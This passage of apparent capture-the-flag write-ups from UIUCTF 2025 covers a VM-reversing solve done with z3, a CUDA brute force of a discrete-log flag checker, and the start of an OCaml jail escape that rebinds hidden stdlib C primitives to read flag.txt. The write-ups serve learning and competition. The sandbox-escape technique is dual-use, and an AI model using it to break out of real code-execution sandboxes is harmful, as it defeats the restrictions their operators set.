				f.write("\n\n")

Decompiled Code

Now we have a pseudo code that makes sense

loc_80100000: addi            sp, sp, -90h
loc_80100004: sd              s0, 88h+var_s0(sp)
loc_80100008: addi            s0, sp, 88h+arg_0
loc_80100010: la              a4, aWhatIsTheFlag# "What is the flag?"
loc_80100018: print a4
loc_80100024: li              a4, 1
loc_80100028: push a4
loc_80100034: li              a4, 2
loc_80100038: push a4
loc_80100044: pop a4
loc_80100048: li              a5, 2
loc_8010004c: bne             a4, a5, loc_80100064


loc_80100058: pop a4
loc_8010005c: li              a5, 1
loc_80100060: beq             a4, a5, loc_80100078


loc_80100068: la              a4, aWrong# "Wrong"
loc_80100070: print a4
loc_80100074: j               loc_801009D0


loc_80100078: nop
loc_8010007c: sd              zero, -8+var_10(s0)
loc_80100084: li              a4, 15
loc_80100088: push_call_1
loc_80100094: ld              a4, -8+var_10(s0)
loc_80100098: push a4
loc_801000a4: la              a4, qword_80101028
loc_801000ac: ld              a4, (qword_80101028 - 80101028h)(a4)
loc_801000b0: push a4
loc_801000c4: a4 = stack[-2] * stack[-1]
loc_801000c8: push a4
loc_801000d4: li              a4, 7
loc_801000d8: stack[-1] rol= a4
loc_801000e0: lui             a4, 28EC7h
loc_801000e4: slli            a4, a4, 2
loc_801000e8: addi            a4, a4, 2D3h
loc_801000ec: stack[-1] ^= a4
loc_801000f8: la              a4, qword_80101030
loc_80100100: ld              a4, (qword_80101030 - 80101030h)(a4)
loc_80100104: stack[-1] += a4
loc_80100110: pop a4
loc_80100114: sd              a5, -8+var_18(s0)
loc_80100120: ld              a4, -8+var_18(s0)
loc_80100124: push a4
loc_80100130: ld              a4, -8+var_18(s0)
loc_80100134: push a4
loc_80100140: li              a4, 2135587861
loc_80100148: push a4
loc_8010015c: a4 = stack[-2] + stack[-1]
loc_80100160: push a4
loc_8010016c: li              a4, 1859775393
loc_80100174: stack[-1] *= a4
loc_80100180: li              a4, 11
loc_80100184: stack[-1] rol= a4
loc_80100194: a4 = stack[-2] ^ stack[-1]
loc_80100198: push a4
loc_801001a4: lui             a4, 13C6Fh
loc_801001a8: slli            a4, a4, 3
loc_801001ac: addi            a4, a4, -647h
loc_801001b0: push a4
loc_801001bc: li              a4, 3
loc_801001c0: stack[-1] rol= a4
loc_801001cc: pop a4
loc_801001d0: sd              a5, -8+var_18(s0)
loc_801001dc: ld              a4, -8+var_18(s0)
loc_801001e0: push a4
loc_801001ec: ld              a4, -8+var_18(s0)
loc_801001f0: push a4
loc_80100204: a4 = stack[-2] + stack[-1]
loc_80100208: push a4
loc_80100214: lui             a4, 37AB7h
loc_80100218: slli            a4, a4, 2
loc_8010021c: addi            a4, a4, -111h
loc_80100220: push a4
loc_80100230: a4 = stack[-2] ^ stack[-1]
loc_80100234: push a4
loc_80100240: li              a4, 5
loc_80100244: stack[-1] rol= a4
loc_80100250: lui             a4, 16A53h
loc_80100254: slli            a4, a4, 3
loc_80100258: addi            a4, a4, -5B3h
loc_8010025c: stack[-1] *= a4
loc_80100268: li              a4, 1051962371
loc_80100270: slli            a4, a4, 2
loc_80100274: stack[-1] += a4
loc_80100280: li              a4, 13
loc_80100284: stack[-1] rol= a4
loc_80100294: a4 = stack[-2] ^ stack[-1]
loc_80100298: push a4
loc_8010029c: ld              a5, -8+var_10(s0)
loc_801002a0: addi            a5, a5, 1
loc_801002a4: sd              a5, -8+var_10(s0)
loc_801002ac: pop_call_1
loc_801002b0: sd              a5, -8+var_20(s0)
loc_801002bc: push a4
loc_801002c4: li              a4, 2
loc_801002c8: push_call_1
loc_801002d0: li              a4, 1
loc_801002d4: push_call_2
loc_801002dc: li              a4, 1
loc_801002e0: push_call_3
loc_801002ec: li              a4, 6
loc_801002f0: stack[-1] += a4
loc_801002f8: pop_call_3
loc_801002fc: sd              a5, -8+var_28(s0)
loc_80100304: pop_call_2
loc_80100308: sd              a5, -8+var_30(s0)
loc_80100310: pop_call_1
loc_80100314: sd              a5, -8+var_38(s0)
loc_80100320: li              a4, 8
loc_80100324: stack[-1] += a4
loc_80100334: pop a4
loc_80100338: push_call_1
loc_80100340: getchar a4
loc_80100344: sb              a5, -8+var_39(s0)
loc_80100348: lbu             a5, -8+var_39(s0)
loc_8010034c: andi            a4, a5, 0FFh
loc_80100350: li              a5, 10
loc_80100354: beq             a4, a5, loc_801003C4


loc_80100360: lbu             a4, -8+var_39(s0)
loc_80100364: push a4
loc_80100370: li              a4, -1
loc_80100374: push a4
loc_80100384: a4 = stack[-2] ^ stack[-1]
loc_80100388: push a4
loc_80100394: li              a4, 1
loc_80100398: stack[-1] += a4
loc_801003a4: pop a4
loc_801003ac: andi            a4, a4, 0FFh
loc_801003b0: encrypt a4
loc_801003b8: pop_call_1
loc_801003bc: sd              a5, -8+var_48(s0)
loc_801003c0: j               loc_801003C8


loc_801003c4: nop
loc_801003c8: li              a5, 1
loc_801003cc: sd              a5, -8+var_50(s0)
loc_801003d4: li              a4, 6
loc_801003d8: push_call_1
loc_801003e4: ld              a4, -8+var_50(s0)
loc_801003e8: push a4
loc_801003f4: ld              a4, -8+var_50(s0)
loc_801003f8: stack[-1] *= a4
loc_8010040c: a4 = rol stack[-2] stack[-1]
loc_80100410: push a4
loc_8010041c: ld              a4, -8+var_50(s0)
loc_80100420: push a4
loc_8010042c: li              a4, 1
loc_80100430: stack[-1] += a4
loc_8010043c: pop a4
loc_80100440: sd              a5, -8+var_50(s0)
loc_80100448: la              a4, qword_80101038
loc_80100450: ld              a4, (qword_80101038 - 80101038h)(a4)
loc_80100454: stack[-1] ^= a4
loc_80100460: pop a4
loc_80100464: sd              a5, -8+var_58(s0)
loc_80100470: pop a4
loc_80100474: sd              a5, -8+var_60(s0)
loc_80100480: li              a4, 3
loc_80100484: push a4
loc_80100490: ld              a4, -8+var_58(s0)
loc_80100494: push a4
loc_8010049c: ld              a4, -8+var_60(s0)
loc_801004a0: stack[-1] ^= a4
loc_801004b4: a4 = stack[-2] + stack[-1]
loc_801004b8: push a4
loc_801004c4: li              a4, -1
loc_801004c8: push a4
loc_801004d0: ld              a4, -8+var_58(s0)
loc_801004d4: stack[-1] ^= a4
loc_801004e0: li              a4, -1
loc_801004e4: push a4
loc_801004ec: ld              a4, -8+var_60(s0)
loc_801004f0: stack[-1] ^= a4
loc_80100504: a4 = stack[-2] | stack[-1]
loc_80100508: push a4
loc_80100514: li              a4, 3
loc_80100518: push a4
loc_8010052c: a4 = stack[-2] * stack[-1]
loc_80100530: push a4
loc_80100544: a4 = stack[-2] + stack[-1]
loc_80100548: push a4
loc_80100554: li              a4, -1
loc_80100558: push a4
loc_80100560: ld              a4, -8+var_58(s0)
loc_80100564: stack[-1] ^= a4
loc_80100570: li              a4, -1
loc_80100574: push a4
loc_8010057c: ld              a4, -8+var_60(s0)
loc_80100580: stack[-1] ^= a4
loc_80100594: a4 = stack[-2] | stack[-1]
loc_80100598: push a4
loc_801005a0: li              a4, -1
loc_801005a4: stack[-1] ^= a4
loc_801005b0: li              a4, 5
loc_801005b4: push a4
loc_801005c8: a4 = stack[-2] * stack[-1]
loc_801005cc: push a4
loc_801005e0: a4 = stack[-2] + stack[-1]
loc_801005e4: push a4
loc_801005ec: pop_call_1
loc_801005f0: sd              a5, -8+var_68(s0)
loc_801005fc: pop a4
loc_80100600: la              a5, qword_80101040
loc_80100608: ld              a5, (qword_80101040 - 80101040h)(a5)
loc_8010060c: beq             a4, a5, loc_80100634


loc_80100614: la              a4, aWrong# "Wrong"
loc_8010061c: print a4
loc_8010062c: pop a4
loc_80100630: exit


loc_80100634: li              a5, 4
loc_80100638: sd              a5, -8+var_70(s0)
loc_80100640: li              a4, 1
loc_80100644: push_call_2
loc_8010064c: ld              a4, -8+var_70(s0)
loc_80100650: push_call_1
loc_8010065c: ld              a4, -8+var_50(s0)
loc_80100660: push a4
loc_8010066c: ld              a4, -8+var_50(s0)
loc_80100670: stack[-1] *= a4
loc_80100684: a4 = rol stack[-2] stack[-1]
loc_80100688: push a4
loc_80100694: ld              a4, -8+var_50(s0)
loc_80100698: push a4
loc_801006a4: li              a4, 1
loc_801006a8: stack[-1] += a4
loc_801006b4: pop a4
loc_801006b8: sd              a5, -8+var_50(s0)
loc_801006c0: la              a4, qword_80101038
loc_801006c8: ld              a4, (qword_80101038 - 80101038h)(a4)
loc_801006cc: stack[-1] ^= a4
loc_801006d8: pop a4
loc_801006dc: sd              a5, -8+var_58(s0)
loc_801006e8: pop a4
loc_801006ec: sd              a5, -8+var_60(s0)
loc_801006f8: ld              a4, -8+var_60(s0)
loc_801006fc: push a4
loc_80100708: li              a4, 1
loc_8010070c: push a4
loc_80100718: ld              a4, -8+var_60(s0)
loc_8010071c: push a4
loc_80100728: li              a4, -1
loc_8010072c: push a4
loc_8010073c: a4 = stack[-2] ^ stack[-1]
loc_80100740: push a4
loc_80100754: a4 = stack[-2] + stack[-1]
loc_80100758: push a4
loc_80100764: ld              a4, -8+var_58(s0)
loc_80100768: stack[-1] += a4
loc_80100778: a4 = stack[-2] ^ stack[-1]
loc_8010077c: push a4
loc_80100784: ld              a4, -8+var_60(s0)
loc_80100788: stack[-1] ^= a4
loc_80100790: pop_call_1
loc_80100794: sd              a5, -8+var_78(s0)
loc_801007a0: pop a4
loc_801007a4: sd              a5, -8+var_80(s0)
loc_801007a8: ld              a4, -8+var_80(s0)
loc_801007ac: la              a5, qword_80101048
loc_801007b4: ld              a5, (qword_80101048 - 80101048h)(a5)
loc_801007b8: bne             a4, a5, loc_801007E4


loc_801007c4: ld              a4, -8+var_80(s0)
loc_801007c8: push a4
loc_801007cc: li              a5, 1
loc_801007d0: sd              a5, -8+var_70(s0)
loc_801007d8: pop_call_2
loc_801007dc: sd              a5, -8+var_88(s0)
loc_801007e0: j               loc_80100844


loc_801007e4: ld              a4, -8+var_80(s0)
loc_801007e8: la              a5, qword_80101050
loc_801007f0: ld              a5, (qword_80101050 - 80101050h)(a5)
loc_801007f4: bne             a4, a5, loc_80100820


loc_801007fc: la              a4, aCorrect# "Correct"
loc_80100804: print a4
loc_80100814: pop a4
loc_80100818: unknown_1973
loc_8010081c: j               loc_80100844


loc_80100824: la              a4, aWrong# "Wrong"
loc_8010082c: print a4
loc_8010083c: pop a4
loc_80100840: unknown_404
loc_80100848: li              a4, 991469
loc_80100850: push_call_1
loc_80100858: li              a4, 692549
loc_80100860: push_call_3
loc_80100868: li              a4, 823212
loc_80100870: push_call_2
loc_8010087c: li              a4, 31815
loc_80100884: push a4
loc_80100890: li              a4, 26492
loc_80100898: push a4
loc_801008a4: li              a4, 815730
loc_801008ac: push a4
loc_801008b8: li              a4, 469207
loc_801008c0: stack[-1] rol= a4
loc_801008c8: li              a4, 330825
loc_801008d0: stack[-1] ^= a4
loc_801008dc: li              a4, 66912
loc_801008e4: stack[-1] += a4
loc_801008f0: li              a4, 858794
loc_801008f8: stack[-1] *= a4
loc_80100904: li              a4, 329986
loc_8010090c: push a4
loc_80100918: li              a4, 67744
loc_80100920: push a4
loc_8010092c: li              a4, 24871
loc_80100934: stack[-1] *= a4
loc_8010093c: li              a4, 50
loc_80100940: encrypt a4
loc_80100948: li              a4, 155059
loc_80100950: print a4
loc_80100960: pop_call_2
loc_80100964: push a4
loc_80100974: pop_call_3
loc_80100978: push a4
loc_80100988: pop_call_1
loc_8010098c: push a4
loc_80100998: pop a4
loc_8010099c: la              a5, qword_80101058
loc_801009a4: ld              a5, (qword_80101058 - 80101058h)(a5)
loc_801009a8: bne             a4, a5, loc_801009C0


loc_801009b0: la              a4, aCorrect# "Correct"
loc_801009b8: print a4
loc_801009bc: j               loc_801009D0


loc_801009c4: la              a4, aWrong# "Wrong"
loc_801009cc: print a4
loc_801009d0: ld              s0, 88h+var_s0(sp)
loc_801009d4: addi            sp, sp, 90h
loc_801009d8: ret

Solve

Now we can actually see a somewhat readable code. We can start by noticing that the code is divided into 4 sections, the first one is like it’s checking that the vm is working properly, then there are two crc and the last one is probably a decoy given that it’s doing 3 nested for loops of length 991469, 692549 and 823212, which would amount to 565 quadrillion that is not feasible.

We can now start to implement the encrypt function in python

def flag_to_data(flag):
    memory_data = [
        0x70, 0x17, 0x58, 0x61, 0x76, 0x01, 0x00, 0x4e,
        0x45, 0xc7, 0xdf, 0xa9, 0xc2, 0xa3, 0x2a, 0xd6,
        0xf2, 0x3a, 0xca, 0x49, 0x39, 0xc0, 0xdb, 0x03,
        0x70, 0x72, 0x71, 0xea, 0x5f, 0xaa, 0xb7, 0x48,
        0x3a, 0xa1, 0x9b, 0x4e, 0x21, 0x3c, 0xa3, 0x39,
        0xbf, 0x15, 0x16, 0x81, 0x0a, 0xc7, 0xba, 0xfb,
        0x27, 0x50, 0x95, 0x39, 0xea, 0x7d, 0x6b, 0xc5,
        0x89, 0x03, 0x98, 0xbf, 0xf0, 0xd7, 0x99, 0xdb,
        0x30, 0x7c, 0xd7, 0x7a, 0x4b, 0xbf, 0xe1, 0x5e,
        0xb4, 0xb0, 0xc9, 0xc4, 0x31, 0xb6, 0x10, 0x5c,
        0x7f, 0xe6, 0xbc, 0x64, 0x9e, 0xdc, 0xe4, 0x89,
        0xc3, 0x5e, 0x1b, 0xcd, 0x01, 0x71, 0x29, 0x9d,
        0x6a, 0x8d, 0xed, 0x52, 0x33, 0xc2, 0x71, 0x02,
        0x46, 0x46, 0x0d, 0xc7, 0xe1, 0xde, 0x6c, 0xe1,
        0xef, 0xbb, 0x7f, 0x7b, 0x9c, 0xb7, 0x39, 0x1d,
        0x70, 0xeb, 0x02, 0x32, 0xe6, 0x61, 0x03, 0xdf,
    ]

    memory = memory_data[::] + [0] * 100

    buf_1 = 0x800060A0 - 0x800060A0
    buf_2 = 0x800060DF - 0x800060A0
    buf_3 = 0x800060E0 - 0x800060A0
    buf_4 = 0x8000611F - 0x800060A0

    for b in flag:
        b = (b ^ 0xff) + 1
        memory[buf_1] = b ^ 0x29
        memory[buf_2] = b - 82
        memory[buf_3] = b ^ ((memory[buf_2] - memory[buf_1]) & 0xFF)
        v71 = ((b & 0xFF) << 4) | ((b & 0xFF) >> 4)
        memory[buf_4] = v71 & 0xFF
        buf_1 += 1
        buf_2 -= 1
        buf_3 += 1
        buf_4 -= 1

    qwords = []
    for addr in range(0, 128, 16):
        bytes_data = []
        for i in range(16):
            bytes_data.append(memory[addr + i])

        qword1 = 0
        qword2 = 0
        for i in range(8):
            qword1 |= (bytes_data[i] << (i * 8))
            qword2 |= (bytes_data[i + 8] << (i * 8))

        qwords.append(qword1)
        qwords.append(qword2)

    return qwords

Then we can follow up with the first CRC

def rot_l(x, n):
    n %= 64
    x = ((x << n) | (x >> (64-n)) & 0xFFFFFFFFFFFFFFFF)
    return x & 0xFFFFFFFFFFFFFFFF


def crc1(data):
    for i in range(1, 8):
        data[-i] = rot_l(data[-i], i ** 2) ^ 0x9E3779B97F4A7C15

        local_60 = data[-i]
        local_68 = data[-i - 1]

        data[-i - 1] = ((((local_60 ^ local_68) + 3) & 0xFFFFFFFFFFFFFFFF) +
                        ((((local_60 ^ 0xFFFFFFFFFFFFFFFF) | (
                                    local_68 ^ 0xFFFFFFFFFFFFFFFF)) * 3) & 0xFFFFFFFFFFFFFFFF) +
                        ((((local_60 ^ 0xFFFFFFFFFFFFFFFF) | (
                                    local_68 ^ 0xFFFFFFFFFFFFFFFF)) ^ 0xFFFFFFFFFFFFFFFF) * 5) & 0xFFFFFFFFFFFFFFFF)

        data[-i - 1] &= 0xFFFFFFFFFFFFFFFF

    return data[0]

Lastly the second CRC

def crc2(data):
    i = 8

    for _ in range(5):
        data[-1] = rot_l(data[-1], i ** 2) ^ 0x9E3779B97F4A7C15
        i += 1

        local_60 = data[-1]
        local_68 = data[-2]
        data = data[:-2]

        data.append((local_68 ^ 0xFFFFFFFFFFFFFFFF) + 1 + local_60)
        data[-1] &= 0xFFFFFFFFFFFFFFFF

    s.add(data[-1] == 0x0796DCF410F11057)

    for _ in range(2):
        data[-1] = rot_l(data[-1], i ** 2) ^ 0x9E3779B97F4A7C15
        i += 1

        local_60 = data[-1]
        local_68 = data[-2]
        data = data[:-2]

        data.append((local_68 ^ 0xFFFFFFFFFFFFFFFF) + 1 + local_60)
        data[-1] &= 0xFFFFFFFFFFFFFFFF

    return data

Now we need to add the constraints from the original code

blocks = flag_to_data(flag)
s.add(crc1(blocks[8:]) == 0x37FBE21EAE04066A)

data = crc2(blocks[:8])
x = data.pop()
s.add(x == 0x5F36D6201C352A7A)

Final Script

Now by assembling the previous snippets together we get the final solve script (plus the z3 “boilerplate” for the symbolic flag).

The only missing piece was the flag length. Since it wasn’t explicitly checked or enforced in the binary, we attached GDB and set a breakpoint on getchar to observe how many characters were being read. The program attempted to read up to 0x50 characters + ‘\n’ (80 characters, which seemed quite long for a flag), so, instead of assuming that was the real length, we bruteforced the correct one in the script by trying all possible values until we found one that satisfied all constraints.

from z3 import *


def flag_to_data(flag):
    memory_data = [
        0x70, 0x17, 0x58, 0x61, 0x76, 0x01, 0x00, 0x4e,
        0x45, 0xc7, 0xdf, 0xa9, 0xc2, 0xa3, 0x2a, 0xd6,
        0xf2, 0x3a, 0xca, 0x49, 0x39, 0xc0, 0xdb, 0x03,
        0x70, 0x72, 0x71, 0xea, 0x5f, 0xaa, 0xb7, 0x48,
        0x3a, 0xa1, 0x9b, 0x4e, 0x21, 0x3c, 0xa3, 0x39,
        0xbf, 0x15, 0x16, 0x81, 0x0a, 0xc7, 0xba, 0xfb,
        0x27, 0x50, 0x95, 0x39, 0xea, 0x7d, 0x6b, 0xc5,
        0x89, 0x03, 0x98, 0xbf, 0xf0, 0xd7, 0x99, 0xdb,
        0x30, 0x7c, 0xd7, 0x7a, 0x4b, 0xbf, 0xe1, 0x5e,
        0xb4, 0xb0, 0xc9, 0xc4, 0x31, 0xb6, 0x10, 0x5c,
        0x7f, 0xe6, 0xbc, 0x64, 0x9e, 0xdc, 0xe4, 0x89,
        0xc3, 0x5e, 0x1b, 0xcd, 0x01, 0x71, 0x29, 0x9d,
        0x6a, 0x8d, 0xed, 0x52, 0x33, 0xc2, 0x71, 0x02,
        0x46, 0x46, 0x0d, 0xc7, 0xe1, 0xde, 0x6c, 0xe1,
        0xef, 0xbb, 0x7f, 0x7b, 0x9c, 0xb7, 0x39, 0x1d,
        0x70, 0xeb, 0x02, 0x32, 0xe6, 0x61, 0x03, 0xdf,
    ]

    memory = memory_data[::] + [0] * 100

    buf_1 = 0x800060A0 - 0x800060A0
    buf_2 = 0x800060DF - 0x800060A0
    buf_3 = 0x800060E0 - 0x800060A0
    buf_4 = 0x8000611F - 0x800060A0

    for b in flag:
        b = (b ^ 0xff) + 1
        memory[buf_1] = b ^ 0x29
        memory[buf_2] = b - 82
        memory[buf_3] = b ^ ((memory[buf_2] - memory[buf_1]) & 0xFF)
        v71 = ((b & 0xFF) << 4) | ((b & 0xFF) >> 4)
        memory[buf_4] = v71 & 0xFF
        buf_1 += 1
        buf_2 -= 1
        buf_3 += 1
        buf_4 -= 1

    qwords = []
    for addr in range(0, 128, 16):
        bytes_data = []
        for i in range(16):
            bytes_data.append(memory[addr + i])

        qword1 = 0
        qword2 = 0
        for i in range(8):
            qword1 |= (bytes_data[i] << (i * 8))
            qword2 |= (bytes_data[i + 8] << (i * 8))

        qwords.append(qword1)
        qwords.append(qword2)

    return qwords


def rot_l(x, n):
    n %= 64
    x = ((x << n) | (x >> (64-n)) & 0xFFFFFFFFFFFFFFFF)
    return x & 0xFFFFFFFFFFFFFFFF


def crc1(data):
    for i in range(1, 8):
        data[-i] = rot_l(data[-i], i ** 2) ^ 0x9E3779B97F4A7C15

        local_60 = data[-i]
        local_68 = data[-i - 1]

        data[-i - 1] = ((((local_60 ^ local_68) + 3) & 0xFFFFFFFFFFFFFFFF) +
                        ((((local_60 ^ 0xFFFFFFFFFFFFFFFF) | (
                                    local_68 ^ 0xFFFFFFFFFFFFFFFF)) * 3) & 0xFFFFFFFFFFFFFFFF) +
                        ((((local_60 ^ 0xFFFFFFFFFFFFFFFF) | (
                                    local_68 ^ 0xFFFFFFFFFFFFFFFF)) ^ 0xFFFFFFFFFFFFFFFF) * 5) & 0xFFFFFFFFFFFFFFFF)

        data[-i - 1] &= 0xFFFFFFFFFFFFFFFF

    return data[0]


def crc2(data):
    i = 8

    for _ in range(5):
        data[-1] = rot_l(data[-1], i ** 2) ^ 0x9E3779B97F4A7C15
        i += 1

        local_60 = data[-1]
        local_68 = data[-2]
        data = data[:-2]

        data.append((local_68 ^ 0xFFFFFFFFFFFFFFFF) + 1 + local_60)
        data[-1] &= 0xFFFFFFFFFFFFFFFF

    s.add(data[-1] == 0x0796DCF410F11057)

    for _ in range(2):
        data[-1] = rot_l(data[-1], i ** 2) ^ 0x9E3779B97F4A7C15
        i += 1

        local_60 = data[-1]
        local_68 = data[-2]
        data = data[:-2]

        data.append((local_68 ^ 0xFFFFFFFFFFFFFFFF) + 1 + local_60)
        data[-1] &= 0xFFFFFFFFFFFFFFFF

    return data


for length in range(10, 0x50, 1): # 32
    flag = [BitVec(f'flag_{i}', 64) for i in range(length)]
    s = Solver()

    for i in range(len(flag)):
        s.add(flag[i] >= 48, flag[i] <= 125)

    s.add(flag[0] == ord('u'))
    s.add(flag[1] == ord('i'))
    s.add(flag[2] == ord('u'))
    s.add(flag[3] == ord('c'))
    s.add(flag[4] == ord('t'))
    s.add(flag[5] == ord('f'))
    s.add(flag[6] == ord('{'))
    s.add(flag[-1] == ord('}'))

    blocks = flag_to_data(flag)

    s.add(crc1(blocks[8:]) == 0x37FBE21EAE04066A)

    data = crc2(blocks[:8])
    x = data.pop()
    s.add(x == 0x5F36D6201C352A7A)

    print('Checking...', length)
    res = s.check()
    if res == sat:
        model = s.model()
        print("Solution found:")
        result = [chr(model[flag[i]].as_long()) if str(model[flag[i]]) != "None" else '?' for i in range(length)]
        print(''.join(result))
    else:
        print(res)

We can now wait until the correct len is found (which is 32) and we win.

Flag

uiuctf{M3m0Ry_M4ppED_SysTEmca11}

UIUCTF 25 - flag_checker

info@theromanxpl0.it (TRX) — Tue, 29 Jul 2025 11:15:30 +0200

Description

Another flag checker challenge…can you get the correct input to print out the flag?

author: epistemologist

Analysis

We start by opening the binary attachment with IDA, from there I can see that the main is fairly simple, it reads an input, runs some checks and then prints the flag.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  _BYTE v4[40]; // [rsp+0h] [rbp-30h] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  get_input(v4, argv, envp);
  if ( (unsigned __int8)check_input((__int64)v4) )
  {
    puts("PRINTING FLAG: ");
    print_flag(v4);
  }
  return 0;
}

First we take a look to the print_flag function to see that it takes our input as “key” to decrypt the flag and print it

unsigned __int64 __fastcall print_flag(__int64 a1)
{
  int i; // [rsp+1Ch] [rbp-44h]
  _DWORD v3[14]; // [rsp+20h] [rbp-40h] BYREF
  unsigned __int64 v4; // [rsp+58h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  for ( i = 0; i <= 7; ++i )
    v3[i] = F(flag_enc[i], *(unsigned int *)(4LL * i + a1), 0xFFFFFF2FLL);
  printf("sigpwny{%s}", (const char *)v3);
  return v4 - __readfsqword(0x28u);
}

We can now check the content of the function F, discovering that it is the fast exponentiation function

__int64 __fastcall F(__int64 a1, __int64 a2, __int64 a3)
{
  unsigned __int64 v5; // [rsp+18h] [rbp-10h]
  unsigned __int64 v6; // [rsp+20h] [rbp-8h]

  v5 = 1LL;
  v6 = a1 % a3;
  while ( a2 > 0 )
  {
    if ( (a2 & 1) != 0 )
      v5 = v6 * v5 % a3;
    v6 = v6 * v6 % a3;
    a2 >>= 1;
  }
  return v5;
}

Now we can finally see the check_input function

__int64 __fastcall check_input(__int64 a1)
{
  int i; // [rsp+10h] [rbp-8h]

  for ( i = 0; i <= 7; ++i )
  {
    if ( (unsigned int)F(test_pt[i], *(unsigned int *)(4LL * i + a1), 0xFFFFFF2FLL) != test_ct[i] )
      return 0LL;
  }
  return 1LL;
}

As we can see, it’s doing pow(test_pt[i], a1[i], 0xFFFFFF2FLL) != test_ct[i] where a1 are 4 bytes of the key, so now we can take the constants from IDA

.rodata:0000000000002040                 public test_pt
.rodata:0000000000002040 ; unsigned int test_pt[8]
.rodata:0000000000002040 test_pt         dd 2265B1F5h, 91B7584Ah, 0D8F16ADFh, 0CD613E30h, 0C386BBC4h
.rodata:0000000000002040                                         ; DATA XREF: check_input+45↑o
.rodata:0000000000002054                 dd 1027C4D1h, 414C343Ch, 1E2FEB89h
.rodata:0000000000002060                 public test_ct
.rodata:0000000000002060 ; _DWORD test_ct[8]
.rodata:0000000000002060 test_ct         dd 0DC44BF5Eh, 5AFF1CECh, 0E1E9B4C2h, 1329B92h, 8F9CA92Ah
.rodata:0000000000002060                                         ; DATA XREF: check_input+6F↑o
.rodata:0000000000002074                 dd 0E45C5B4h, 604A4B91h, 7081EB59h
.rodata:0000000000002080                 public flag_enc
.rodata:0000000000002080 ; unsigned int flag_enc[8]
.rodata:0000000000002080 flag_enc        dd 24189111h, 0FD94E945h, 1B9F64A6h, 7FECE9A3h, 0FC2A0EDEh
.rodata:0000000000002080                                         ; DATA XREF: print_flag+54↑o
.rodata:0000000000002094                 dd 576EDCF5h, 1E44C9Ch, 658AF790h

now, we know that we should do a discrete log, but I’m a revver, not a cryptoer, so I can do it in another way…. Bruteforce with CUDA 🔥

Solve

#include 
#include 
#include 


typedef unsigned long long ull;

__device__ ull test_pt[] = {0x2265B1F5LL, 0x91B7584ALL, 0x0D8F16ADFLL, 0x0CD613E30LL, 0x0C386BBC4LL, 0x1027C4D1LL, 0x414C343CLL, 0x1E2FEB89LL};
__device__ ull test_ct[] = {0x0DC44BF5ELL, 0x5AFF1CECLL, 0x0E1E9B4C2LL, 0x1329B92LL, 0x8F9CA92ALL, 0x0E45C5B4LL, 0x604A4B91LL, 0x7081EB59LL};


__device__ ull F(ull a1, ull a2, ull a3) {
	ull v5;
	ull v6;

	v5 = 1LL;
	v6 = a1 % a3;
	while ( a2 > 0 )
	{
		if ( (a2 & 1) != 0 )
			v5 = v6 * v5 % a3;
		v6 = v6 * v6 % a3;
		a2 >>= 1;
	}
	return v5;
}

__global__ void	brute() {
	ull exp = threadIdx.x + (blockIdx.x + (blockIdx.y + blockIdx.z * 256) * 256) * 256;
	for ( int i = 0; i <= 7; ++i ){
		if (F(test_pt[i], exp, 0xFFFFFF2FLL) == test_ct[i] ) {
			printf("Found: %d %016llx\n", i, exp);
		}
	}
}

int main() {
	dim3	blocks(256, 256, 256);
	dim3	threads(256);

	brute<<>>();
	cudaGetLastError();
	cudaDeviceSynchronize();
}

This will output the following:

Found: 4 0000000035bf992d
Found: 5 0000000063ca828d
Found: 1 000000007311d8a3
Found: 2 0000000078e51061
Found: 0 000000007ed4d57b
Found: 3 00000000a6cecc1b
Found: 6 00000000c324c985
Found: 7 00000000c4647159
Found: 2 00000000f8e50ff8

We can now take them (except the duplicate for “2”) and win

found = [None] * 8

found[4] = int("35bf992d", 16)
found[5] = int("63ca828d", 16)
found[1] = int("7311d8a3", 16)
found[2] = int("78e51061", 16)
found[0] = int("7ed4d57b", 16)
found[3] = int("a6cecc1b", 16)
found[6] = int("c324c985", 16)
found[7] = int("c4647159", 16)
# found[2] = int("f8e50ff8", 16)

enc = [0x24189111, 0xFD94E945, 0x1B9F64A6, 0x7FECE9A3, 0xFC2A0EDE, 0x576EDCF5, 0x1E44C9C, 0x658AF790]

print('sigpwny{', end='')
for i in range(8):
	block = hex(pow(enc[i], found[i], 0xFFFFFF2F))[2:]
	print(bytes.fromhex(block)[::-1].decode(), end='')
print('}')

Flag: sigpwny{CrackingDiscreteLogs4TheFun/Lols}

UIUCTF 25 - nocaml

info@theromanxpl0.it (TRX) — Mon, 28 Jul 2025 11:21:17 +0200

This is essentially an OCaml jail.

Overview

The challenge runs user provided OCaml source code (encoded in base64). The compiler is invoked with the flag -open Nocaml, that automatically imports all the content of the module Nocaml into the scope of our code.

#excerpt from go.sh...
read -r line && echo "$line" | base64 -d > "$tmp_dir/code.ml"
ocamlc -o "$tmp_dir/out" -open Nocaml "$tmp_dir/code.ml" && "$tmp_dir/out"

In nocaml.ml we can see that all the values of the standard library are rebound to the unit type (()). Once those identifiers are shadowed we have no way to reach them.

let raise = ()
let raise_notrace = ()
let invalid_arg = ()
let failwith = ()
let ( = ) = ()
let ( <> ) = ()
let ( < ) = ()
let ( > ) = ()
let ( <= ) = ()
let ( >= ) = ()
let compare = ()
let min = ()
let max = ()
let ( == ) = ()
let ( != ) = ()
let not = ()
let ( && ) = ()
let ( || ) = ()
let __LOC__ = ()
let __FILE__ = ()
let __LINE__ = ()
let __MODULE__ = ()
(* and so on ... *)
module Stdlib = struct end
module String = struct end
module StringLabels = struct end
module Sys = struct end
module Type = struct end
(* and so on ... *)

As usual, the objective is reading the file flag.txt.

Exploitation

The first thing that came to mind was using Pervasives (the old name of the Stdlib module). Unfortunately newer versions of OCaml removed this alias.

At this point I went for the foreign function interface. With the use of the external keyword, it’s possible to declare and invoke functions from the C ABI.

We don’t have a way to create new foreign functions, but we don’t really need to! The Stdlib is always compiled and linked, even if we can’t access it from the code. This means that plenty of internal functions can be brought back with the FFI.

By diving into the standard library code I found some useful IO primitives:

caml_sys_open to open a file descriptor
caml_ml_open_descriptor_out and caml_ml_open_descriptor_in to create channels from fds
caml_ml_output_char and caml_ml_input_char to read and write chars

The script I used to get the flag is the following:

(* directly from Stdlib *)
type open_flag =
    Open_rdonly | Open_wronly | Open_append
  | Open_creat | Open_trunc | Open_excl
  | Open_binary | Open_text | Open_nonblock

external open_desc : string -> open_flag list -> int -> int = "caml_sys_open";;
external open_descriptor_out : int -> out_channel = "caml_ml_open_descriptor_out";;
